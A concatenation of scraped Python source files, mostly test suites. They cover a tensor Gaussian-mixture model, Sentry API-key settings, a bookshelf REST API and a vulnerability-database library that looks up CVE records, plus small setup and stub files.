meanShape = (6, data_import.shape[0], data_import.shape[2], data_import.shape[3], data_import.shape[4])
def test_cvGMM():
"""Stub test."""
gmmDF = cvGMM(data_import, 4, other_import[1])
assert isinstance(gmmDF, pd.DataFrame)
def test_import():
"""Stub test."""
dataTwo, _ = smallDF(data_import.shape[1] * 2)
assert data_import.shape[0] == dataTwo.shape[0]
assert 2 * data_import.shape[1] == dataTwo.shape[1]
assert data_import.shape[2] == dataTwo.shape[2]
assert data_import.shape[3] == dataTwo.shape[3]
assert data_import.shape[4] == dataTwo.shape[4]
def test_sc():
x, _ = import_thompson_drug()
def test_cov_to_prec():
"""Test that we can go from Cp to vector, and from vector to Cp without changing values."""
x0 = vector_guess(meanShape, rank=3)
_, _, covFac = vector_to_cp_pt(x0, 3, meanShape)
precBuild = covFactor_to_precisions(covFac)
assert np.all(np.isfinite(precBuild))
def test_CP_to_vec():
"""Test that we can go from Cp to vector, and from vector to Cp without changing values."""
x0 = vector_guess(meanShape, rank=3)
built = vector_to_cp_pt(x0, 3, meanShape)
# Check that we can get a likelihood
ll = maxloglik_ptnnp(x0, meanShape, 3, data_import.to_numpy())
assert np.isfinite(ll)
def test_comparingGMM():
"""Test that we can ensures log likelihood is calculated the same"""
x0 = vector_guess(meanShape, rank=3)
nk, meanFact, covFac = vector_to_cp_pt(x0, 3, meanShape)
precBuild = covFactor_to_precisions(covFac)
optimized1 = comparingGMM(data_import, meanFact, precBuild, nk)
optimized2 = comparingGMMjax(data_import.to_numpy(), nk, meanFact, precBuild)
np.testing.assert_allclose(optimized1, optimized2, rtol=1e-5)
def test_independence():
"""Test that conditions can be separately evaluated as expected."""
x0 = vector_guess(meanShape, rank=3)
data_numpy = data_import.to_numpy()
nk, meanFact, covFac = vector_to_cp_pt(x0, 3, meanShape)
precBuild = covFactor_to_precisions(covFac)
ll1 = comparingGMM(data_import, meanFact, precBuild, nk)
ll2 = comparingGMMjax(data_numpy, nk, meanFact, precBuild)
np.testing.assert_allclose(ll1, ll2, rtol=1e-5)
# Test that cells are independent
ll3 = comparingGMMjax(data_numpy[:, :5, :, :, :], nk, meanFact, precBuild)
ll3 += comparingGMMjax(data_numpy[:, 5:, :, :, :], nk, meanFact, precBuild)
np.testing.assert_allclose(ll2, ll3, rtol=1e-5)
# Test that ligands are independent
# meanFactOne = deepcopy(meanFact)
# meanFactOne[4] = meanFact[4][:5, :]
# ptFactOne = deepcopy(ptFact)
# ptFactOne[4] = ptFact[4][:5, :]
# ll4 = comparingGMMjax(data_numpy[:, :, :, :, :5], nk, meanFactOne, ptFactOne)
# meanFactTwo = deepcopy(meanFact)
# meanFactTwo[4] = meanFact[4][5:, :]
# ptFactTwo = deepcopy(ptFact)
# ptFactTwo[4] = ptFact[4][5:, :]
# ll4 += comparingGMMjax(data_numpy[:, :, :, :, 5:], nk, meanFactTwo, ptFactTwo)
# np.testing.assert_allclose(ll2, ll4, rtol=1e-5)
def test_fit():
"""Test that fitting can run fine."""
nk, fac, ptfac, ll, _, _ = minimize_func(data_import, 3, 10, maxiter=20)
loglik = tensorGMM_CV(data_import, numFolds=3, numClusters=3, numRank=2, maxiter=20)
assert isinstance(loglik, float)
assert isinstance(ll, float)
|
<filename>gmm/tests/test_GMM.py<gh_stars>0
"""
Test the data import.
"""
import pandas as pd
import numpy as np
from ..imports import smallDF
from ..GMM import cvGMM
from ..scImport import import_thompson_drug
from ..tensor import vector_to_cp_pt, comparingGMM, comparingGMMjax, vector_guess, maxloglik_ptnnp, minimize_func, tensorGMM_CV, covFactor_to_precisions
data_import, other_import = smallDF(10)
meanShape = (6, data_import.shape[0], data_import.shape[2], data_import.shape[3], data_import.shape[4])
def test_cvGMM():
"""Stub test."""
gmmDF = cvGMM(data_import, 4, other_import[1])
assert isinstance(gmmDF, pd.DataFrame)
def test_import():
"""Stub test."""
dataTwo, _ = smallDF(data_import.shape[1] * 2)
assert data_import.shape[0] == dataTwo.shape[0]
assert 2 * data_import.shape[1] == dataTwo.shape[1]
assert data_import.shape[2] == dataTwo.shape[2]
assert data_import.shape[3] == dataTwo.shape[3]
assert data_import.shape[4] == dataTwo.shape[4]
def test_sc():
x, _ = import_thompson_drug()
def test_cov_to_prec():
"""Test that we can go from Cp to vector, and from vector to Cp without changing values."""
x0 = vector_guess(meanShape, rank=3)
_, _, covFac = vector_to_cp_pt(x0, 3, meanShape)
precBuild = covFactor_to_precisions(covFac)
assert np.all(np.isfinite(precBuild))
def test_CP_to_vec():
"""Test that we can go from Cp to vector, and from vector to Cp without changing values."""
x0 = vector_guess(meanShape, rank=3)
built = vector_to_cp_pt(x0, 3, meanShape)
# Check that we can get a likelihood
ll = maxloglik_ptnnp(x0, meanShape, 3, data_import.to_numpy())
assert np.isfinite(ll)
def test_comparingGMM():
"""Test that we can ensures log likelihood is calculated the same"""
x0 = vector_guess(meanShape, rank=3)
nk, meanFact, covFac = vector_to_cp_pt(x0, 3, meanShape)
precBuild = covFactor_to_precisions(covFac)
optimized1 = comparingGMM(data_import, meanFact, precBuild, nk)
optimized2 = comparingGMMjax(data_import.to_numpy(), nk, meanFact, precBuild)
np.testing.assert_allclose(optimized1, optimized2, rtol=1e-5)
def test_independence():
"""Test that conditions can be separately evaluated as expected."""
x0 = vector_guess(meanShape, rank=3)
data_numpy = data_import.to_numpy()
nk, meanFact, covFac = vector_to_cp_pt(x0, 3, meanShape)
precBuild = covFactor_to_precisions(covFac)
ll1 = comparingGMM(data_import, meanFact, precBuild, nk)
ll2 = comparingGMMjax(data_numpy, nk, meanFact, precBuild)
np.testing.assert_allclose(ll1, ll2, rtol=1e-5)
# Test that cells are independent
ll3 = comparingGMMjax(data_numpy[:, :5, :, :, :], nk, meanFact, precBuild)
ll3 += comparingGMMjax(data_numpy[:, 5:, :, :, :], nk, meanFact, precBuild)
np.testing.assert_allclose(ll2, ll3, rtol=1e-5)
# Test that ligands are independent
# meanFactOne = deepcopy(meanFact)
# meanFactOne[4] = meanFact[4][:5, :]
# ptFactOne = deepcopy(ptFact)
# ptFactOne[4] = ptFact[4][:5, :]
# ll4 = comparingGMMjax(data_numpy[:, :, :, :, :5], nk, meanFactOne, ptFactOne)
# meanFactTwo = deepcopy(meanFact)
# meanFactTwo[4] = meanFact[4][5:, :]
# ptFactTwo = deepcopy(ptFact)
# ptFactTwo[4] = ptFact[4][5:, :]
# ll4 += comparingGMMjax(data_numpy[:, :, :, :, 5:], nk, meanFactTwo, ptFactTwo)
# np.testing.assert_allclose(ll2, ll4, rtol=1e-5)
def test_fit():
"""Test that fitting can run fine."""
nk, fac, ptfac, ll, _, _ = minimize_func(data_import, 3, 10, maxiter=20)
loglik = tensorGMM_CV(data_import, numFolds=3, numClusters=3, numRank=2, maxiter=20)
assert isinstance(loglik, float)
assert isinstance(ll, float)
|
en
| 0.803833
|
Test the data import. Stub test. Stub test. Test that we can go from Cp to vector, and from vector to Cp without changing values. Test that we can go from Cp to vector, and from vector to Cp without changing values. # Check that we can get a likelihood Test that we can ensures log likelihood is calculated the same Test that conditions can be separately evaluated as expected. # Test that cells are independent # Test that ligands are independent # meanFactOne = deepcopy(meanFact) # meanFactOne[4] = meanFact[4][:5, :] # ptFactOne = deepcopy(ptFact) # ptFactOne[4] = ptFact[4][:5, :] # ll4 = comparingGMMjax(data_numpy[:, :, :, :, :5], nk, meanFactOne, ptFactOne) # meanFactTwo = deepcopy(meanFact) # meanFactTwo[4] = meanFact[4][5:, :] # ptFactTwo = deepcopy(ptFact) # ptFactTwo[4] = ptFact[4][5:, :] # ll4 += comparingGMMjax(data_numpy[:, :, :, :, 5:], nk, meanFactTwo, ptFactTwo) # np.testing.assert_allclose(ll2, ll4, rtol=1e-5) Test that fitting can run fine.
| 2.313782
| 2
|
REQreate/_api.py
|
michellqueiroz-ua/instance-generator
| 1
|
6628467
|
<filename>REQreate/_api.py
from generator_lines_mq_with_osmnx import retrieve_network
from passenger_requests import generate_requests
|
<filename>REQreate/_api.py
from generator_lines_mq_with_osmnx import retrieve_network
from passenger_requests import generate_requests
|
none
| 1
| 1.228959
| 1
|
|
setup.py
|
zapp-oz/AutoGit
| 0
|
6628468
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="reinit",
version="0.0.2",
author="<NAME>",
author_email="<EMAIL>",
description="To re-initialize and push any github repository to your own github.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/zapp-oz/AutoGit",
packages=['reinit'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=['pygit2==1.3.0', 'requests == 2.24.0'],
python_requires='>=3.6',
entry_points={
'console_scripts':[
'reinit=reinit.app:main'
]
}
)
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="reinit",
version="0.0.2",
author="<NAME>",
author_email="<EMAIL>",
description="To re-initialize and push any github repository to your own github.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/zapp-oz/AutoGit",
packages=['reinit'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=['pygit2==1.3.0', 'requests == 2.24.0'],
python_requires='>=3.6',
entry_points={
'console_scripts':[
'reinit=reinit.app:main'
]
}
)
|
none
| 1
| 1.62611
| 2
|
|
virtual/bin/django-admin.py
|
greatdaniels/awwards-app
| 0
|
6628469
|
#!/home/dannyboy/Documents/python/django/projects/awwards-app/virtual/bin/python
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
#!/home/dannyboy/Documents/python/django/projects/awwards-app/virtual/bin/python
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
en
| 0.475228
|
#!/home/dannyboy/Documents/python/django/projects/awwards-app/virtual/bin/python
| 0.967866
| 1
|
python-libs/behavior.py
|
massimo-nocentini/competitive-programming
| 2
|
6628470
|
<reponame>massimo-nocentini/competitive-programming
def dispatch(*args, table, default=lambda k, e: k):
'''
Dispatch behavior in *even* positions within `args` against mapping `table`.
It accepts a variable list of arguments, however of even length, where
*hashable* objects in *even* positions are used in the key for dispatching against
logic container `table`, namely a mapping of functions; in parallel, objects
in *odd* positions within `args` are used as values, respectively.
Keyword argument `default` is a function that consumes two arguments:
the former is the key not found in the dispatch `table`; the latter one
is the caught exception, if re-raising would be performed. Its default
behavior is to return the key as it is.
'''
key = tuple([args[e] for e in range(0, len(args), 2)])
values = [args[o] for o in range(1, len(args), 2)]
try:
method = table[key]
return method(*values)
except KeyError as e:
return default(key, e)
|
def dispatch(*args, table, default=lambda k, e: k):
'''
Dispatch behavior in *even* positions within `args` against mapping `table`.
It accepts a variable list of arguments, however of even length, where
*hashable* objects in *even* positions are used in the key for dispatching against
logic container `table`, namely a mapping of functions; in parallel, objects
in *odd* positions within `args` are used as values, respectively.
Keyword argument `default` is a function that consumes two arguments:
the former is the key not found in the dispatch `table`; the latter one
is the caught exception, if re-raising would be performed. Its default
behavior is to return the key as it is.
'''
key = tuple([args[e] for e in range(0, len(args), 2)])
values = [args[o] for o in range(1, len(args), 2)]
try:
method = table[key]
return method(*values)
except KeyError as e:
return default(key, e)
|
en
| 0.912129
|
Dispatch behavior in *even* positions within `args` against mapping `table`. It accepts a variable list of arguments, however of even length, where *hashable* objects in *even* positions are used in the key for dispatching against logic container `table`, namely a mapping of functions; in parallel, objects in *odd* positions within `args` are used as values, respectively. Keyword argument `default` is a function that consumes two arguments: the former is the key not found in the dispatch `table`; the latter one is the caught exception, if re-raising would be performed. Its default behavior is to return the key as it is.
| 3.705069
| 4
|
tests/sentry/web/frontend/test_organization_api_key_settings.py
|
mitsuhiko/sentry
| 4
|
6628471
|
<reponame>mitsuhiko/sentry
from __future__ import absolute_import
from django.core.urlresolvers import reverse
from sentry.models import ApiKey
from sentry.testutils import TestCase, PermissionTestCase
class OrganizationApiKeySettingsPermissionTest(PermissionTestCase):
def setUp(self):
super(OrganizationApiKeySettingsPermissionTest, self).setUp()
key = ApiKey.objects.create(organization=self.organization)
self.path = reverse('sentry-organization-api-key-settings', args=[
self.organization.slug, key.id
])
def test_teamless_admin_cannot_load(self):
self.assert_teamless_admin_cannot_access(self.path)
def test_member_cannot_load(self):
self.assert_member_cannot_access(self.path)
def test_owner_can_load(self):
self.assert_owner_can_access(self.path)
class OrganizationApiKeySettingsTest(TestCase):
def test_renders_with_context(self):
organization = self.create_organization(name='foo', owner=self.user)
key = ApiKey.objects.create(organization=organization)
path = reverse('sentry-organization-api-key-settings', args=[
organization.slug, key.id,
])
self.login_as(self.user)
resp = self.client.get(path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/organization-api-key-settings.html')
assert resp.context['organization'] == organization
assert resp.context['key'] == key
def test_not_found(self):
organization = self.create_organization(name='foo', owner=self.user)
path = reverse('sentry-organization-api-key-settings', args=[
organization.slug, 99999,
])
self.login_as(self.user)
resp = self.client.get(path)
assert resp.status_code == 404
|
from __future__ import absolute_import
from django.core.urlresolvers import reverse
from sentry.models import ApiKey
from sentry.testutils import TestCase, PermissionTestCase
class OrganizationApiKeySettingsPermissionTest(PermissionTestCase):
def setUp(self):
super(OrganizationApiKeySettingsPermissionTest, self).setUp()
key = ApiKey.objects.create(organization=self.organization)
self.path = reverse('sentry-organization-api-key-settings', args=[
self.organization.slug, key.id
])
def test_teamless_admin_cannot_load(self):
self.assert_teamless_admin_cannot_access(self.path)
def test_member_cannot_load(self):
self.assert_member_cannot_access(self.path)
def test_owner_can_load(self):
self.assert_owner_can_access(self.path)
class OrganizationApiKeySettingsTest(TestCase):
def test_renders_with_context(self):
organization = self.create_organization(name='foo', owner=self.user)
key = ApiKey.objects.create(organization=organization)
path = reverse('sentry-organization-api-key-settings', args=[
organization.slug, key.id,
])
self.login_as(self.user)
resp = self.client.get(path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/organization-api-key-settings.html')
assert resp.context['organization'] == organization
assert resp.context['key'] == key
def test_not_found(self):
organization = self.create_organization(name='foo', owner=self.user)
path = reverse('sentry-organization-api-key-settings', args=[
organization.slug, 99999,
])
self.login_as(self.user)
resp = self.client.get(path)
assert resp.status_code == 404
|
none
| 1
| 2.105752
| 2
|
|
bookshelf/tests.py
|
ffkirill/library
| 0
|
6628472
|
<reponame>ffkirill/library<gh_stars>0
import typing
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.files import File
from rest_framework.test import APITestCase
from book.models import Book
from .models import BookshelfItem
Items = typing.List[BookshelfItem]
Books = typing.List[Book]
class BookshelfPositionTestCase(APITestCase):
def prepare(self):
response = self.client.post(
'/api/author/',
{'first_name': 'Name',
'middle_name': 'Middle',
'last_name': 'Last'},
format='json')
self.assertEqual(response.status_code, 201)
self.author_url = response.data['url']
response = self.client.post(
'/api/book/',
{'title': 'title',
'place_of_publication': 'place',
'publisher': 'pub',
'type_of_book': 'type',
'year': '2001-01-01',
'isbn': 1234567891230,
'content': File(SimpleUploadedFile('up.txt', b'123')),
'authors': [self.author_url],
})
self.assertEqual(response.status_code, 201)
self.book_url = response.data['url']
response = self.client.post(
'/api/bookshelf/',
{
'title': 'Bookshelf'
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.bookshelf_url = response.data['url']
def test_insert_item_btw_a_and_b(self) -> None:
self.prepare()
# Insert Item A
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1')
# Insert Item B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '2')
# Insert Item C between A and B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
'position': '1/2'
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1/2')
def test_insert_item_btw_0_and_a(self) -> None:
self.prepare()
# Insert Item A
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1')
# Insert Item B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
'position': '1/2'
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1/2')
def test_change_position_a_c_b(self) -> None:
self.prepare()
# Insert Item A
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1')
# Insert Item B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '2')
# Insert Item C
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '3')
# Change position of C to be between A and B
payload = response.data
payload['position'] = '3/2'
response = self.client.put(
payload['url'],
payload,
format='json'
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['position'], '3/2')
# Check sequence A C B
response = self.client.get('/api/bookshelfitem/')
self.assertEqual(tuple(item['position'] for item in response.data),
('1', '3/2', '2'))
# Test filters
response = self.client.get('/api/bookshelfitem/?bookshelf=1')
self.assertEqual(tuple(item['position'] for item in response.data),
('1', '3/2', '2'))
response = self.client.get('/api/bookshelfitem/?bookshelf=22')
self.assertEqual(len(response.data), 0)
|
import typing
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.files import File
from rest_framework.test import APITestCase
from book.models import Book
from .models import BookshelfItem
Items = typing.List[BookshelfItem]
Books = typing.List[Book]
class BookshelfPositionTestCase(APITestCase):
def prepare(self):
response = self.client.post(
'/api/author/',
{'first_name': 'Name',
'middle_name': 'Middle',
'last_name': 'Last'},
format='json')
self.assertEqual(response.status_code, 201)
self.author_url = response.data['url']
response = self.client.post(
'/api/book/',
{'title': 'title',
'place_of_publication': 'place',
'publisher': 'pub',
'type_of_book': 'type',
'year': '2001-01-01',
'isbn': 1234567891230,
'content': File(SimpleUploadedFile('up.txt', b'123')),
'authors': [self.author_url],
})
self.assertEqual(response.status_code, 201)
self.book_url = response.data['url']
response = self.client.post(
'/api/bookshelf/',
{
'title': 'Bookshelf'
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.bookshelf_url = response.data['url']
def test_insert_item_btw_a_and_b(self) -> None:
self.prepare()
# Insert Item A
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1')
# Insert Item B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '2')
# Insert Item C between A and B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
'position': '1/2'
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1/2')
def test_insert_item_btw_0_and_a(self) -> None:
self.prepare()
# Insert Item A
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1')
# Insert Item B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
'position': '1/2'
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1/2')
def test_change_position_a_c_b(self) -> None:
self.prepare()
# Insert Item A
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '1')
# Insert Item B
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '2')
# Insert Item C
response = self.client.post(
'/api/bookshelfitem/',
{
'bookshelf': self.bookshelf_url,
'book': self.book_url,
},
format='json'
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response.data['position'], '3')
# Change position of C to be between A and B
payload = response.data
payload['position'] = '3/2'
response = self.client.put(
payload['url'],
payload,
format='json'
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['position'], '3/2')
# Check sequence A C B
response = self.client.get('/api/bookshelfitem/')
self.assertEqual(tuple(item['position'] for item in response.data),
('1', '3/2', '2'))
# Test filters
response = self.client.get('/api/bookshelfitem/?bookshelf=1')
self.assertEqual(tuple(item['position'] for item in response.data),
('1', '3/2', '2'))
response = self.client.get('/api/bookshelfitem/?bookshelf=22')
self.assertEqual(len(response.data), 0)
|
en
| 0.584851
|
# Insert Item A # Insert Item B # Insert Item C between A and B # Insert Item A # Insert Item B # Insert Item A # Insert Item B # Insert Item C # Change position of C to be between A and B # Check sequence A C B # Test filters
| 2.39113
| 2
|
makepy/tox.py
|
ubunatic/pimpy
| 4
|
6628473
|
<gh_stars>1-10
from makepy.shell import run, rm
import logging
log = logging.getLogger(__name__)
def tox(envlist=None):
log.info('starting tox tests for envlist: %s', envlist)
if envlist is None: run(['tox'])
else: run(['tox', '-e', envlist])
def clean(): rm('.tox')
|
from makepy.shell import run, rm
import logging
log = logging.getLogger(__name__)
def tox(envlist=None):
log.info('starting tox tests for envlist: %s', envlist)
if envlist is None: run(['tox'])
else: run(['tox', '-e', envlist])
def clean(): rm('.tox')
|
none
| 1
| 2.385447
| 2
|
|
solutions/spavanac.py
|
dx-dt/Kattis
| 0
|
6628474
|
<filename>solutions/spavanac.py
# https://open.kattis.com/problems/spavanac
import sys
input = sys.stdin.read().split()
h = int(input[0])
m = int(input[1])
if m >= 45:
print h,m-45
else:
print (h-1)%24,(m-45)%60
|
<filename>solutions/spavanac.py
# https://open.kattis.com/problems/spavanac
import sys
input = sys.stdin.read().split()
h = int(input[0])
m = int(input[1])
if m >= 45:
print h,m-45
else:
print (h-1)%24,(m-45)%60
|
en
| 0.509969
|
# https://open.kattis.com/problems/spavanac
| 2.697521
| 3
|
tests/test_database.py
|
tisnik/victimsdb-lib
| 2
|
6628475
|
<reponame>tisnik/victimsdb-lib<filename>tests/test_database.py
"""Tests for `victimsdb_lib.database` module."""
import pytest
from victimsdb_lib.database import VictimsDB
def test_from_dir(db_small_path):
"""Test VictimsDB.from_dir()."""
db = VictimsDB.from_dir(db_small_path)
assert db
def test_basic(db_small_path):
"""Test VictimsDB.cves_for() for known package."""
db = VictimsDB.from_dir(db_small_path)
cves = db.cves_for('werkzeug')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2016-10516'
def test_basic_unknown_package(db_small_path):
"""Test VictimsDB.cves_for() for unknown package."""
db = VictimsDB.from_dir(db_small_path)
cves = db.cves_for('xyzzy_unknown_package')
assert cves is not None
assert len(cves) == 0
def test_improper_yaml_parsing(db_path_with_improper_files):
"""Test VictimsDB.cves_for() YAMLs with improper/not parseable files."""
db = VictimsDB.from_dir(db_path_with_improper_files)
cves = db.cves_for('xyzzy_unknown_package')
assert cves is not None
assert len(cves) == 0
def test_java_vulnerabilities(db_small_path):
"""Test VictimsDB.java_vulnerabilities()."""
db = VictimsDB.from_dir(db_small_path)
java_db = db.java_vulnerabilities()
cves = java_db.cves_for('com.google.guava:guava-gwt')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2018-10237'
assert not java_db.cves_for('not-there', ecosystem='python')
def test_javascript_vulnerabilities(db_small_path):
"""Test VictimsDB.javascript_vulnerabilities()."""
db = VictimsDB.from_dir(db_small_path)
javascript_db = db.javascript_vulnerabilities()
cves = javascript_db.cves_for('moment')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2017-18214'
assert not javascript_db.cves_for('not-there', ecosystem='python')
def test_python_vulnerabilities(db_small_path):
"""Test VictimsDB.python_vulnerabilities()."""
db = VictimsDB.from_dir(db_small_path)
python_db = db.python_vulnerabilities()
cves = python_db.cves_for('werkzeug')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2016-10516'
assert not python_db.cves_for('not-there', ecosystem='java')
def test_len(db_small_path):
"""Test len() on VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
assert len(db) == 3
def test_getitem(db_small_path):
"""Test [] on VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
assert 'CVE-2017-18214' == db['CVE-2017-18214'].cve_id
with pytest.raises(KeyError):
db['CVE-0000-0000']
def test_iter(db_small_path):
"""Test iter() with VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
wanted = ['CVE-2018-10237', 'CVE-2017-18214', 'CVE-2016-10516']
for record in db:
assert record.cve_id in wanted
wanted.remove(record.cve_id)
def test_contains(db_small_path):
"""Test `in` with VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
assert 'CVE-2018-10237' in db
assert 'CVE-0000-0000' not in db
assert None not in db
def test_merge(db_small_path, db_python_only):
"""Test VictimsDB().merge()."""
db1 = VictimsDB.from_dir(db_small_path)
assert len(db1) == 3
db2 = VictimsDB.from_dir(db_python_only)
assert len(db2) == 2
db1.merge(db2)
assert len(db1) == 4
cve = db1['CVE-2016-10516']
assert cve.affects('werkzeug', version='0.11.10')
def test_merge_dont_keep_ours(db_small_path, db_python_only):
"""Test VictimsDB().merge(), but override our records."""
db1 = VictimsDB.from_dir(db_small_path)
db2 = VictimsDB.from_dir(db_python_only)
db1.merge(db2, keep_ours=False)
assert len(db1) == 4
cve = db1['CVE-2016-10516']
assert not cve.affects('werkzeug', version='0.11.10')
def test_read_yamls_from_git_url(git_url):
"""Test VictimsDB().from_git_url()."""
db = VictimsDB.from_git_url(git_url)
assert db
cves = db.cves_for('werkzeug')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2016-10516'
|
"""Tests for `victimsdb_lib.database` module."""
import pytest
from victimsdb_lib.database import VictimsDB
def test_from_dir(db_small_path):
"""Test VictimsDB.from_dir()."""
db = VictimsDB.from_dir(db_small_path)
assert db
def test_basic(db_small_path):
"""Test VictimsDB.cves_for() for known package."""
db = VictimsDB.from_dir(db_small_path)
cves = db.cves_for('werkzeug')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2016-10516'
def test_basic_unknown_package(db_small_path):
"""Test VictimsDB.cves_for() for unknown package."""
db = VictimsDB.from_dir(db_small_path)
cves = db.cves_for('xyzzy_unknown_package')
assert cves is not None
assert len(cves) == 0
def test_improper_yaml_parsing(db_path_with_improper_files):
"""Test VictimsDB.cves_for() YAMLs with improper/not parseable files."""
db = VictimsDB.from_dir(db_path_with_improper_files)
cves = db.cves_for('xyzzy_unknown_package')
assert cves is not None
assert len(cves) == 0
def test_java_vulnerabilities(db_small_path):
"""Test VictimsDB.java_vulnerabilities()."""
db = VictimsDB.from_dir(db_small_path)
java_db = db.java_vulnerabilities()
cves = java_db.cves_for('com.google.guava:guava-gwt')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2018-10237'
assert not java_db.cves_for('not-there', ecosystem='python')
def test_javascript_vulnerabilities(db_small_path):
"""Test VictimsDB.javascript_vulnerabilities()."""
db = VictimsDB.from_dir(db_small_path)
javascript_db = db.javascript_vulnerabilities()
cves = javascript_db.cves_for('moment')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2017-18214'
assert not javascript_db.cves_for('not-there', ecosystem='python')
def test_python_vulnerabilities(db_small_path):
"""Test VictimsDB.python_vulnerabilities()."""
db = VictimsDB.from_dir(db_small_path)
python_db = db.python_vulnerabilities()
cves = python_db.cves_for('werkzeug')
assert len(cves) == 1
assert cves[0].cve_id == 'CVE-2016-10516'
assert not python_db.cves_for('not-there', ecosystem='java')
def test_len(db_small_path):
"""Test len() on VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
assert len(db) == 3
def test_getitem(db_small_path):
"""Test [] on VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
assert 'CVE-2017-18214' == db['CVE-2017-18214'].cve_id
with pytest.raises(KeyError):
db['CVE-0000-0000']
def test_iter(db_small_path):
"""Test iter() with VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
wanted = ['CVE-2018-10237', 'CVE-2017-18214', 'CVE-2016-10516']
for record in db:
assert record.cve_id in wanted
wanted.remove(record.cve_id)
def test_contains(db_small_path):
"""Test `in` with VictimsDB()."""
db = VictimsDB.from_dir(db_small_path)
assert 'CVE-2018-10237' in db
assert 'CVE-0000-0000' not in db
assert None not in db
def test_merge(db_small_path, db_python_only):
"""Test VictimsDB().merge()."""
db1 = VictimsDB.from_dir(db_small_path)
assert len(db1) == 3
db2 = VictimsDB.from_dir(db_python_only)
assert len(db2) == 2
db1.merge(db2)
assert len(db1) == 4
cve = db1['CVE-2016-10516']
assert cve.affects('werkzeug', version='0.11.10')
def test_merge_dont_keep_ours(db_small_path, db_python_only):
"""Test VictimsDB().merge(), but override our records."""
db1 = VictimsDB.from_dir(db_small_path)
db2 = VictimsDB.from_dir(db_python_only)
db1.merge(db2, keep_ours=False)
assert len(db1) == 4
cve = db1['CVE-2016-10516']
assert not cve.affects('werkzeug', version='0.11.10')
def test_read_yamls_from_git_url(git_url):
"""Test VictimsDB().from_git_url()."""
db = VictimsDB.from_git_url(git_url)
assert db
cves = db.cves_for('werkzeug')
assert len(cves) == 1
